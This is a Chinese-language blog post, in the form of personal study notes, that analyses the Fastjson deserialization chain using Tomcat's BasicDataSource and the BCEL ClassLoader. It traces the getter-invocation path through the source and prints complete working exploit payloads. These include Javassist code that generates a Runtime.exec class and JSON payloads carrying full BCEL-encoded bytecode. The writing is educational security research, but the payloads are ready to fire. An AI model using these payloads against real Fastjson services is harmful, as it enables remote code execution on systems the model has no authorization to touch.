[JAVA反序列化初学4]Fastjson的BCEL字节码攻击分析

已于 2022-05-08 22:07:13 修改
阅读量3.2k 收藏 2
点赞数 2
分类专栏: JAVA安全 文章标签: java web安全 安全
于 2022-05-08 22:06:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/124655533
版权

这基本是直接从本地笔记md复制上来,主要是自己记录,排版很烂,见谅。

Fastjson与BCEL

在Fastjson中通过BCEL字节码执行恶意代码,需要用到org.apache.tomcat.dbcp.dbcp.BasicDataSource这个类。主要原因是,我们需要加载BCEL字节码的话,需要实现下面这一句话:

import com.sun.org.apache.bcel.internal.util.ClassLoader;
...
new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();

而想要在Fastjson中使用的话,就得在各种fastjson反序列化过程中执行的那些操作中执行到这个操作。而在BasicDataSource中正好有一个能够利用的点。

在544行的地方,方法createConnectionFactory执行了一个getContextClassLoader().loadClass(this.driverClassName)

protected ConnectionFactory createConnectionFactory() throws SQLException {
    Class driverFromCCL = null;
    String user;
    if (this.driverClassName != null) {
        try {
            try {
                if (this.driverClassLoader == null) {
                    Class.forName(this.driverClassName);
                } else {
                    Class.forName(this.driverClassName, true, this.driverClassLoader);
                }
            } catch (ClassNotFoundException var6) {
                driverFromCCL = Thread.currentThread().getContextClassLoader().loadClass(this.driverClassName);

而这里的getContextClassLoader和driverClassName恰好都是可控的,上次说到的Fastjson在反序列化过程中会调用setter来置值。

我们在类中找到了setContextClassLoader和setdriverClassName。

public synchronized void setDriverClassName(String driverClassName) {
    if (driverClassName != null && driverClassName.trim().length() > 0) {
        this.driverClassName = driverClassName;
    } else {
        this.driverClassName = null;
    }

    this.restartNeeded = true;
}

public synchronized void setDriverClassLoader(ClassLoader driverClassLoader) {
    this.driverClassLoader = driverClassLoader;
    this.restartNeeded = true;
}

现在,只要找到哪里调用到createConnectionFactory就能成了,接下来就是一条链到达这里。

在方法createDataSource中第510行找到了这个createConnectionFactory的调用。

protected synchronized DataSource createDataSource() throws SQLException {
    if (this.closed) {
        throw new SQLException("Data source is closed");
    } else if (this.dataSource != null) {
        return this.dataSource;
    } else {
        ConnectionFactory driverConnectionFactory = this.createConnectionFactory();

然后又在getConnection找到了createDataSource的调用。

public Connection getConnection() throws SQLException {
    return this.createDataSource().getConnection();
}

本来以为到这里就算完了,因为上次有说到parseObject调用了对象所有的getter,那这里肯定就会自动触发了。但完全不行。失败的payload如下:

ClassPool classPool=ClassPool.getDefault();
CtClass ctClass=classPool.makeClass("A");
String code="java.lang.Runtime.getRuntime().exec(\"calc\");";
            ctClass.makeClassInitializer().insertAfter(code);
            byte[] b=ctClass.toBytecode();
String bcel="$$BCEL$$"+Utility.encode(b,true);
String str = "{\n" +
    "                \"@type\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\",\n" +
    "                \"driverClassLoader\": {\n" +
    "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
    "                },\n" +
    "                \"driverClassName\": \""+bcel+"\"\n" +
    "        }";
System.out.println(str);
JSON.parse(str);

完全没有反应。去查,发现parseObject并不像想象中那样调用了所有的getter。

FastJson中的 parse() 和 parseObject()方法都可以用来将JSON字符串反序列化成Java对象,parseObject() 本质上也是调用 parse() 进行反序列化的。但是 parseObject() 会额外的将Java对象转为 JSONObject对象,即 JSON.toJSON()。所以进行反序列化时的细节区别在于,parse() 会识别并调用目标类的 setter 方法及某些特定条件的 getter 方法,而 parseObject() 由于多执行了 JSON.toJSON(obj),所以在处理过程中会调用反序列化目标类的所有 setter 和 getter 方法。 ——引用https://jlkl.github.io/2021/12/18/Java_07上面说的

条件:返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong的getter方法

很显然的是getConnection方法是不符合的,返回值类型为Connection。所以正常来说在 FastJson 反序列化的过程中并不会被调用。——(38条消息) 红队漏洞研究-fastjsonBasicDataSource链分析_Gamma_lab的博客-CSDN博客

按网上的说法,如果把这个JsonObject作为key放在json里面的话。会执行key的toString方法,然后因为JsonObject继承了map,map的toString会取得所有的getter,意思是懂了,但不看看代码总觉得不太。还是自己跟跟吧。

在DefaultJSONParser中识别到Map类型,在分支结构中进入了这个重载的参数类型为Map的parseObject。

在这里插入图片描述

跟到了key的toString。

在这里插入图片描述

嵌套,跟进。
在这里插入图片描述

按执行顺序,new JSONSerializer就不进了,进入到write方法,盲猜是调用setter的地方。

在这里插入图片描述

反射取得JsonObject的Class,然后调用了getObjectWriter
在这里插入图片描述

嵌套,进去。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

好长,不一一看了,在这里过去执行了命令,直接从这里进去看看。

在这里插入图片描述

还是进write。这里从值里取出了BasicDataSource。

在这里插入图片描述

在这里插入图片描述

这里得到了JsonObject所有的getter。
在这里插入图片描述

欸嘿,感觉是这里,要成了。
在这里插入图片描述

然后在后面的代码中,遍历所有的getter来执行getPropertyValueDirect

在这里插入图片描述

这里成员变量method的值是getConnection

在这里插入图片描述

跟进去这个函数,这里调用了"connection".get(BasicDataSource),感觉getConnection近在咫尺。

在这里插入图片描述

跟进去,发现反射执行了
在这里插入图片描述

总算找到调用栈了。到这里就连接上了前面的BasicDataSource中的链,就可以RCE了。

在这里插入图片描述

等等,感觉好像漏了一些什么东西。this.getter什么时候传进去的?!

返回write的上一层,这里的上一句取得了这个执行write的对象。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

发现这里就是检验getter的地方,得是上面所述getter才可以。

在这里插入图片描述

调用了几次不同的seriazlizer来get,在最后一次调用get的时候匹配上了entry.key
在这里插入图片描述

在这里插入图片描述

反正就是prewriter取出来的时候,this.getters就已经放进了所有的getter。

最后的payload,长这样。

String str="{\n" +
        "    {\n" +
        "        \"@type\": \"com.alibaba.fastjson.JSONObject\",\n" +
        "        \"x\":{\n" +
        "                \"@type\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\",\n" +
        "                \"driverClassLoader\": {\n" +
        "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
        "                },\n" +
        "                \"driverClassName\": \""+bcel+"\"\n" +
        "        }\n" +
        "    }: \"x\"\n" +
        "}";

{
    {
        "@type": "com.alibaba.fastjson.JSONObject",
        "x":{
                "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource",
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$Ae$90$cfJ$c3$40$Q$c6$bfi$da$s$c6$d46$d5$fa$ef$s$IM$3d$d8$83$c7$W$a1$I$9e$w$8a$91$f6$bc$5d$97$b05MJ$ba$V$df$c8s$_$w$k$7c$A$lJ$9c$84$82$F$97$9d$fdf$86o$7e$M$fb$fd$f3$f9$F$e0$C$c7$E$g$d8$mBc$w$9eE7$WI$d4$bd$9dL$9546$y$82$h$a6$cbL$aak$j$xBup$9e$9b$IN_$c6$3a$d1$e6$92$60$F$9d$R$a1$7c$95$3e$b2$c1$ffc$dc$_$T$a3g$ca$86$cb$90H$99uMh$F$9d$e1$3f$5b$cf$83$87$9a$8bm$ec0L$8aX$3ahp$a6$5e$94$q$b4$83$8d$89$d0d$3a$89z$9b$90$bb$y$95j$b1$60H$T$bb9d$8fP$L$8d$90O7b$fe$m$s$c5$ee$fdba$P$Hp$5c$94q$88$T$94X$f3S$82$D$9b$83$b0$c5$d5$v$y$ee$A$f5W$fe$80$e1$H$eaM$ff$N$ad$f1$8a$5b$84$7d$7e$z$Q$df$i$b4$9e$f0Y$89$b5r$f6$8e$a3U$81$qT$Kp$f5$X$c4$a1$b9$Rj$B$A$A"
        }
    }: "x"
}

或者像这样也行,就是键中不指定反序列化JSONObject。

{
    {
        "x": {
                "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource",
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$Ae$90$cfJ$c3$40$Q$c6$bfi$da$s$c6$d46$d5$fa$ef$s$IM$3d$d8$83$c7$W$a1$I$9e$w$8a$91$f6$bc$5d$97$b05MJ$ba$V$df$c8s$_$w$k$7c$A$lJ$9c$84$82$F$97$9d$fdf$86o$7e$M$fb$fd$f3$f9$F$e0$C$c7$E$g$d8$mBc$w$9eE7$WI$d4$bd$9dL$9546$y$82$h$a6$cbL$aak$j$xBup$9e$9b$IN_$c6$3a$d1$e6$92$60$F$9d$R$a1$7c$95$3e$b2$c1$ffc$dc$_$T$a3g$ca$86$cb$90H$99uMh$F$9d$e1$3f$5b$cf$83$87$9a$8bm$ec0L$8aX$3ahp$a6$5e$94$q$b4$83$8d$89$d0d$3a$89z$9b$90$bb$y$95j$b1$60H$T$bb9d$8fP$L$8d$90O7b$fe$m$s$c5$ee$fdba$P$Hp$5c$94q$88$T$94X$f3S$82$D$9b$83$b0$c5$d5$v$y$ee$A$f5W$fe$80$e1$H$eaM$ff$N$ad$f1$8a$5b$84$7d$7e$z$Q$df$i$b4$9e$f0Y$89$b5r$f6$8e$a3U$81$qT$Kp$f5$X$c4$a1$b9$Rj$B$A$A"
        }
    }:"xxx"
}

简单总结一下payload,最外层先是放了一对键值,键是一个JSONObjct,值随意一个字符串什么都行,这个JSONObject整体会作为一个键,值是xxx。接着会调用到key.toString。也就是这个JSONObject的toString。JSONObejct执行toString其实是在invoke函数中。

在这里插入图片描述

然后调用了父类JSON中的toString,然后又调用toJSONString

在这里插入图片描述

接着就取得了所有JSONObject中的getter。就会调用到JSONObject中的value(BasicDataSource)中的所有getter,也就调用到了getConnection。

最后

这条链前面要调用getConnection的流程实在是太深入了,主要是要得到所有getter,包括getConnection,然后调用,才可以加载字节码执行恶意代码。分析代码太小白了,流程稍微长,稍微深入,脑子就一片混乱了,还是要多分析分析一些利用链,多看看底层代码。

Cgxx
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括JavaBean、集合、日期以及枚举等,并且无任何外部依赖,使得其在实际项目中得到广泛应用。...
fastjson BCEL不出网打法
遇事不决冲冲冲
04-30 6600
BasicDataSource 如果目标服务器没有外网、无法反连,自然就用不了JdbcRowSetImpl利用链这种JNDI注入的利用方式,而TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见,这里就引出BasicDataSource,我们可以直接在Payload中直接传入字节码并且不需要出网,不需要开启特殊的参数,适用范围较广,目标需要引入tomcat依赖,虽说也是
Apache Commons BCELJava字节码工程的强大工具
最新发布
gitblog_00917的博客
08-07 331
Apache Commons BCELJava字节码工程的强大工具 commons-bcelApache Commons BCEL项目地址:https://gitcode.com/gh_mirrors/co/commons-bcel 项目介绍 Apache Commons BCEL(Byte Code Engineering Library)是一个强大的开源库,专门用于处理Java字节码。BC...
fastjson-BCEL不出网打法原理分析
Dokii_i的博客
01-19 2094
这里fastjson提供了AutoType这种方式来指定需要还原的对象以及值 {"@type":"Java_deserialization.User","id":"123"},其中@type后面跟进的就是我们所需要还原的对象 (可控)后面跟进的id也就是这个类里面的属性,如果有一个fastjson反序列化点可控那么我们就可以随 意指定一个恶意类,如果这个恶意类里面的构造方法或者Get,Set方法调用了恶意的方法那么就会造成 反序列化漏洞。2.调用setAutoCommit方法:为什么是true?
Web】速谈FastJson反序列化中BasicDataSource的利用
uuzeray的博客
03-03 1228
那么我们就可以设置​​driverClassLoader​​​为com.sun.org.apache.bcel.internal.util.ClassLoader​​​,设置​​driverClassName​​为恶意的BCEL格式的字节码,配合BCEL初始化任意恶意对象。}​​​ 这一整段外面再套一层​​{}​​,这样的话会把这个整体当做一个JSONObject,会把这个当做key,值为xxx。key为​​JSONObject​​对象,会调用该对象的toString方法。然后会以字符串的形式输出出来。
利用BCELfastjson直接burp回显getshell
2201_75353421的博客
08-03 1518
fastjson我曾经写过漏洞的原理,但是公网遇到的漏洞越来越少,大多都是在内网的环境,内网里没办法使用dnslog去探测回显。这里学习一下用bcel链直接在bp中产生回显进而getshell。
bcel java_BCEL
weixin_30737081的博客
02-13 810
软件简介Byte Code Engineering Library (BCEL),这是Apache Software Foundation 的Jakarta项目的一部分。BCELJava classworking 最广泛使用的一种框架,它可以让您深入 JVM汇编语言进行类操作的细节。BCELJavassist 有不同的处理字节码方法,BCEL在实际的JVM 指令层次上进行操作(BCEL拥有丰...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
Java安全BCEL ClassLoader
「 虚幻私塾」
02-08 1124
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 目录 Java安全BCEL ClassLoader 写在前面 About BCEL 调试分析 食用姿势 Fuzz反序列化Gadget Fastjson BCEL Payload Thymeleaf SSTI Payload Java安全BCEL ClassL
BCEL ClassLoader
混子
12-12 9014
在复现漏洞时,反弹shell始终不成功,后来在一位大佬帖子下看到了这个方法进行写webshell,最终使用蚁剑连接,上线,出于好奇,就自己学习了下,这篇文章主要讲解BCEL
BCELJavassist的介绍
07-18 270
BCEL  介绍: Byte Code Engineering Library (BCEL),这是Apache Software Foundation 的Jakarta 项目的一部分。 正在装载数据…… BCELJava classworking 最广泛使用的一种框架,它可以让您深入 JVM 汇编语言进行类操作的细节。BCELJavassist 有不同的处理字节码方法,BCEL...
Apache Commons BCELJava字节码操作
宋小黑的博客
01-04 1634
咱们今天来聊聊Apache Commons BCEL(Byte Code Engineering Library)。你可能会问,BCEL是什么鬼?别急,小黑这就给你娓娓道来。BCEL,它是一款专门用来操作Java字节码的库。想象一下,Java代码编译后变成了字节码,这些字节码Java虚拟机执行的真正“源代码”。有了BCEL,咱们就能像变魔术一样,对这些字节码进行读取、修改,甚至创造出全新的字节码!那为啥要搞字节码呢?这事儿得从Java的运行原理说起。
BCEL简明教程
evasnowind的专栏
12-04 5132
注意:本文章主要依据BCEL官方手册进行阐述,大部分内容都是从该手册直接翻译过来的,并做了一定的简化,同时还参考了《深入理解Java虚拟机》(周志明著)。笔者在下面阐述的时候也会给出相应的章节,如果读者有不清楚的地方请参考BCEL官方手册或是BCEL API,以及《深入理解Java虚拟机》。 BCEL是什么? 相信搜索到这篇文章的读者应该知道BCEL是啥,不过还是简要提一下吧:BCEL(...
java fastjson反序列化
07-27
Java中的Fastjson库提供了一种方便的方式来进行JSON序列化和反序列化操作。要使用Fastjson进行反序列化,你需要按照以下步骤进行操作: 1. 首先,确保你已经将Fastjson库添加到你的项目中。你可以通过Maven或者手动下载并导入jar文件来添加依赖。 2. 创建一个Java类,该类的结构应该与你要反序列化的JSON数据的结构相匹配。 3. 导入Fastjson的相关类,包括JSON和JSONObject。 4. 使用JSON类的parseObject()方法将JSON字符串转换为JSONObject对象。 5. 使用JSONObject对象的toJavaObject()方法将JSONObject转换为你定义的Java类对象。 下面是一个简单的示例代码,演示了如何使用Fastjson进行反序列化: ```java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Main { public static void main(String[] args) { // JSON数据 String jsonString = "{\"name\":\"John\",\"age\":30}"; // 将JSON字符串转换为JSONObject对象 JSONObject jsonObject = JSON.parseObject(jsonString); // 将JSONObject对象转换为Java对象 Person person = jsonObject.toJavaObject(Person.class); // 打印Java对象的属性值 System.out.println("Name: " + person.getName()); System.out.println("Age: " + person.getAge()); } } class Person { private String name; private int age; // 省略getter和setter方法 public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } } ``` 在上面的示例中,我们首先将JSON字符串转换为JSONObject对象,然后将JSONObject对象转换为Person类的实例。最后,我们可以通过调用Person对象的getter方法来获取属性值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值